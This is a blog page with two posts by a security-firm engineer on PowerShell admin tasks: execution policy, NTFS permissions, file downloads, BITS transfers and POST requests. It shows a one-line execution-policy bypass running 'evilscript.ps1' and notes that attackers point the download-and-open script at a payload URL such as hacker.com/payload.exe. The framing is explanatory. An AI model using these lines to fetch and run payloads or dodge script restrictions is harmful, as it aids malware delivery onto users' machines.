Showing posts with label powershell. Show all posts
Showing posts with label powershell. Show all posts

Wednesday, 18 July 2018

SECURITY TASKS USING POWERSHELL


SECURITY TASKS USING POWERSHELL


PowerShell is a  advanced admin tool for Windows operating system. End users with advanced knowledge or those who have worked with an older version of windows may be much familiar with the command prompt via which you can run commands and scripts. PowerShell is similar but a lot more advanced regarding functionality.
This blog gives you some advanced functions for configuring management and automated tasks. Powershell includes both scripting language and command line shell. It is built on.Net Framework. Its also offers you Integrated Scripting Environment (ISE), which gives you a GUI where you can naturally do all your scripting.
we will see how effectively we can use PowerShell on security-related tasks,

CONTENTS

  1. Understanding Execution Policy
  2. Overriding Execution Policy
  3. Listing NTFS Permissions
  4. Clone NTFS Permissions
  5. Adding Permissions
  6. Removing Permissions
  7. Checking Administrator Privileges

UNDERSTANDING EXECUTION POLICY

 Execution policy enables a user to determine which PowerShell scripts will be allowed to run on your computer. There are four different execution policies are available in the PowerShell.
They are
  • Restricted – no scripts can run. Interactive mode only can be used.
  • AllSigned – the scripts which are signed by the trusted publisher can be able to run
  • RemoteSigned –   scripts which are downloaded must be approved by a trusted publisher before they run.
  • Unrestricted – there will be no restriction on running any PowerShell scripts.

This command will show you current execution policy.
 PS C:\Users\proxy_000> Get-ExecutionPolicy
Restricted
End users should use the RemoteSigned. It will allow the user to run local scripts, but it won’t enable scripts from outside the network or downloaded scripts from the internet.
Professional scripters can use “Bypass” which allow you to run any script regardless of location.
Here is a command to change execution policy for your user account.
PS C:\Users\proxy_000> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

PS C:\Users\proxy_000> Get-ExecutionPolicy
Bypass
PS C:\Users\proxy_000>

OVERRIDING EXECUTION POLICY

 Execution policy is not a security boundary to protect you from attackers. It just acts as a seat belt to protect you. There are many other ways to override the execution policy and execute the scripts or commands.
PS C:\Users\proxy_000> Get-Content ‘c:\evilscript.ps1’ -Raw | powershell.exe -nonprofile -

LISTING NTFS PERMISSIONS

 To view  NTFS permission for folders and files use Get-Act. At first, It won’t show you the actual permission. But we can make visible using this :
PS C:\Users\proxy_000> Get-Acl -path $env:windir | Select-Object -ExpandProperty Access

CLONE NTFS PERMISSIONS

  NTFS access permission is complicated and tricky. To quickly assign NTFS permission to a new folder, you can merely clone permission from another folder that you know has the correct permission applied.
$OriginalPath = “$env:temp\sample”
New-Item -Path $OriginalPath -ItemType Directory
 to assign correct permission to folder “proxy” manually
Explorer.exe “/Select,$OriginalPath.”
 Right-click the proxy folder and choose properties and then click the security tab. Now add security permission you need to apply
When your prototype folder is correctly configured. Use this code to read information about security
$sddl = (Get-Acl $OriginalPath).Sddl
 From this point, you don’t need your prototype folder anymore. It was required to create SDDL definition string.
$newpath = “$env:temp\NewFolder”
md $newpath
$sd = Get-Acl -Path $newpath
$sd.SetSecurityDescriptorSddlForm($sddl)
Set-Acl -Path $newpath -Aclobject $sd

ADDING PERMISSIONS

Adding new permission to an existing security descriptor, first, create an appropriate AccessRule object and configure it.
This script adds a new FileSystemAccessRule to the security descriptor of a file, granting read and write access to proxydomain\proxyaccount.
Make sure you adjust both user account and filename before you test the code:
$colRights = [System.Security.AccessControl.FileSystemRights]’Read, Write’
$InheritanceFlag = [System.Security.AccessControl.InheritanceFlags]::None
$PropagationFlag = [System.Security.AccessControl.PropagationFlags]::None
$objType =[System.Security.AccessControl.AccessControlType]::Allow
$objUser = New-Object System.Security.Principal.NTAccount(‘proxydomain\proxyaccount.’)
$objACE = New-Object System.Security.AccessControl.FileSystemAccessRule `
($objUser, $colRights, $InheritanceFlag, $PropagationFlag, $objType)
# get original SD
$catACL = Get-Acl ‘C:\proxy\pr0xy.txt’
 # add permission
$catACL.AddAccessRule($objACE)
 # write back the appended SD
Set-Acl ‘C:\proxy\pr0xy.txt’ $catACL

REMOVING PERMISSIONS

 To remove a permission from a security descriptor, get access to the Acl entries, and pick the ones to delete and write back the changed security descriptor.
 $catACL = Get-Acl c:\proxy\pr0xy.txt
$unwanted = $catACL.Access |
Where-Object { $_.IdentityReference.Value -eq ‘proxydomain\proxyaccount’ }
$unwanted | ForEach-Object { $null = $catACL.RemoveAccessRule($_) }
Set-Acl -Path c:\proxy\pr0xy.txt -AclObject $catACL

CHECKING ADMINISTRATOR PRIVILEGES

There are many ways to find out if a script runs been elevated. Here’s a straightforward approach that uses whoami.exe (works withWin7/Server 200 R2 or better):
 (whoami.exe /all | Select-String S-1-16-12288) -ne $null
If you do not have whoami.exe, or if you are looking for a more integrated way, you can use a line that is a little longer but identifies Admin status directly, without calling an external program:
(New-Object System.Security.Principal.WindowsPrincipal([System.Security.
Principal.WindowsIdentity]::GetCurrent())).IsInRole([System.Security.Principal.
WindowsBuiltInRole]::Administrator)

CONCLUSION :

 As we discussed in this blog, PowerShell is an advanced admin tool which is capable of performing above mentioned task. By executing these tasks, the admin could save much time. This allows  to avoid attackers to get into our system .
Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization, our constructive and customized solution will help organization from serious threats against system hardening.

AUTHOR

Venkatesh C.S
Security Engineer
Briskinfosec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Related Blogs :
  1.   Two Phases of Powershell- Offensive and Defensive
  2.  How to use Powershell as Handy like Shell Script?
Posted by at No comments:
Labels: , , , , , , ,

Saturday, 30 June 2018

How to use PowerShell as Handy like Shell script?


HOW TO USE POWERSHELL AS HANDY LIKE SHELL SCRIPT?


PowerShell is a mixture of a command line, a functional programming language, and an object-oriented programming language. PowerShell is also called as explorer’s scripting language. With built-in help, command discovery, and with access to much of the .NET Framework, it is possible to dig down through the layers. In this blog, we are going to discuss internet related tasks using PowerShell.
Since Shell script giving more freedom to Linux admins then why not PowerShell can provide it for windows admins. For example, if you are a consultant and some of the things you need to do regularly is to connect into clients Wi-Fi networks. This tasks can be once in a month, or sometimes it will be a daily task as well. Opening the internet explorer and navigating to the page, typing the credentials and submitting the request will take much time. There is some easy way to do your daily routine directly with simple PowerShell scripting. Here I am going to share some sample scripts to automate your routine tasks. My job is also to bring your notice as to how such options are used by potential attackers bypass your security implementations.
Let’s get started…
CONTENTS
  1. Downloading Files
    1. WebClient with Proxy Authentication
    2. Downloading with BitsTransfer
      1. Synchronously method
      2. Asynchronously method
    3. Download Web Page Content
  2. Search and View Any Videos
  3. Refreshing Web Pages
  4. HTML Encoding and Decoding
  5. Sending POST Data via PowerShell

DOWNLOADING FILES

To automatically download files for internet, we can use .NET WebClient object. This script shares the internet connection settings with IE explorer.
$url = ‘http://www.briskinfosec.com/sample/example.pdf’

            $object = New-Object Net.WebClient

            $localPath = “$home\Documents\example.pdf”

            $object.DownloadFile($url, $localPath)

            explorer.exe “/SELECT,$localPath”

Invoke-Item -Path $localPath
Most attackers use this script to auto download their payloads. Powershell has ability to bypass antivirus as-well.
The attacker will insert his/her server addresses where the payload is placed in the URL section
$url = ‘http://www.hacker.com/payload.exe’  

WEBCLIENT WITH PROXY AUTHENTICATION

If you want to use internet proxy, to access the internet with web client object, we can use a proxy in the script with default credentials to it.
function Get-WebClient

{

            $wc = New-Object Net.WebClient

            $wc.UseDefaultCredentials = $true

            $wc.Proxy.Credentials = $wc.Credentials

            $wc

}

$url = ‘http://www.briskinfosec.com/sample/example.pdf’

            $object = Get-WebClient

            $localPath = “$home\Documents\example.pdf”

            $object.DownloadFile($url, $localPath)

            explorer.exe “/SELECT,$localPath”

Invoke-Item -Path $localPath

 DOWNLOADING WITH BITSTRANSFER

 BITS technology is used to download updates for windows. It can download large files, but not as fast. When the restart intercepts the download, once the system boots up it starts to download where it is left off. BITS can use to download files synchronously (while you wait) and asynchronously (in the background).

   SYNCHRONOUSLY METHOD:

 $url = ‘http://www.briskinfosec.com/sample/example.pdf’

$target = “$HOME\Documents\example.pdf”

            Import-Module BitsTransfer

            Start-BitsTransfer -Source $url -Destination $target

            explorer.exe “/SELECT,$target”
Invoke-Item -Path $target

   ASYNCHRONOUSLY METHOD:

 $url = ‘http://powershell.com/cs/media/p/31297/download.aspx’

$target = “$HOME\Documents\PowerShell_Using_Registry.pdf”

            Import-Module BitsTransfer

            Start-BitsTransfer -Source $url -Destination $target -DisplayName             BriskDownload -Asynchronous
Once it is finished run this command to finalize the download
Get-BitsTransfer -Name ‘BriskDownload’ | Complete-BitsTransfer

  DOWNLOAD WEB PAGE CONTENT

            This script will bring the new web page content using the WebClient object.
$url = ‘http://briskinfosec.com/powershell/
            $wc = New-Object System.Net.WebClient

            $wc.DownloadString($url)

 SEARCH AND VIEW ANY VIDEOS

PowerShell has a fantastic feature that let you search for YouTube videos for the given keyword the user mentioned and offers those videos.
In this script, we are searching for “PowerShell tutorial” from YouTube. The list opens in a grid viewed window, so you can use the full-text search at the top or sort columns until you find the video you want to give a try.
Next, click the video to select it, and then click “OK” in the lower-right corner of the grid.
PowerShell will launch your web browser and play the video. Awesome!
$keyword = “PowerShell tutorial”

            Invoke-RestMethod -Uri “https://gdata.youtube.com/feeds/api/videos?v=2&q=$($keyword.Replace(‘ ‘,’+’))” |

            Select-Object -Property Title, @{N=’Author’;E={$_.Author.Name}},             @{N=’Link’;E={$_.Content.src}}, @{N=’Updated’;E={[DateTime]$_.Updated}} | Sort-Object -Property Updated -Descending | 
Out-GridView -Title “Select your ‘$Keyword’ video, then click OK to view.” -PassThru |

ForEach-Object { Start-Process $_.Link }

  REFRESHING WEB PAGES

Just think, we have opened some web pages in our IE explorer and we need the page to display the current information like cricket score and share market readings. Instead of manually reloading the pages, we can use this script to do it automatically for us.
Note: it will work only on Internet Explorer, and it needs to run from PowerShell console, not from ISE.
So you will be IMPORT-MODULE example.ps1 and invoke the script
function Refresh-WebPages {

param(

            $interval = 5  # this will refresh every five seconds

)

            “Refreshing IE Windows every $interval seconds.”

            “Press any key to stop.”

            $shell = New-Object -ComObject Shell.Application

do {

            ‘Refreshing ALL HTML’

            $shell.Windows() |

            Where-Object { $_.Document.url } |

            ForEach-Object { $_.Refresh() }

            Start-Sleep -Seconds $interval

} until ( [System.Console]::KeyAvailable )

            [System.Console]::ReadKey($true) | Out-Null

}

   HTML ENCODING AND DECODING

This script is used to encode and decode the HTML content to special characters
[System.Web.HttpUtility]::HTMLEncode(‘This is a test & a good way to encode. ÄÖÜ’)

[System.Web.HttpUtility]::HTMLDecode(‘This is a test & a good way to encode.ÄÖÜ’)

OUTPUT:

 PS> [System.Web.HttpUtility]::HTMLEncode(‘This is a test & a good way to encode. ÄÖÜ’)

This is a test & a good way to encode. ÄÖÜ

PS> [System.Web.HttpUtility]::HTMLDecode(‘This is a test & a good way to encode. ÄÖÜ’)

This is a test & a good way to encode. ÄÖÜ

SENDING POST DATA VIA POWERSHELL

Most of the time feedback or any votes on web pages are sent back via POST requests. You can send that informaton through PowerShell. We need to create a simple POST request with target URL and  with appropriate  parameter  then send it
$url = “http://anyurl.com”

            $parameters = “voting=true&poll_id=5” # your POST parameters

            $http_request = New-Object -ComObject Msxml2.XMLHTTP

            $http_request.Open(‘POST’, $url, $false)

            $http_request.SetRequestHeader(“Content-type”, “application/x-www-form-urlencoded”)

            $http_request.SetRequestHeader(“Content-length”, $parameters.length)

            $http_request.SetRequestHeader(“Connection”, “close”)

            $http_request.Send($parameters)

            $http_request.StatusText

CONCLUSION

In this blog we have discussed about the internet related task which is used by the system admins where they can save their time by executing the previous discussed scripts.  There are many more scripts available to automate every routine process on your daily basis.
Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization, our constructive and customized solution will help organization from serious threats against system hardening.

AUTHOR

Venkatesh C.S
SecurityEngineer
Briskinfosec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Posted by at No comments:
Labels: , , , , , ,
Subscribe to: Posts (Atom)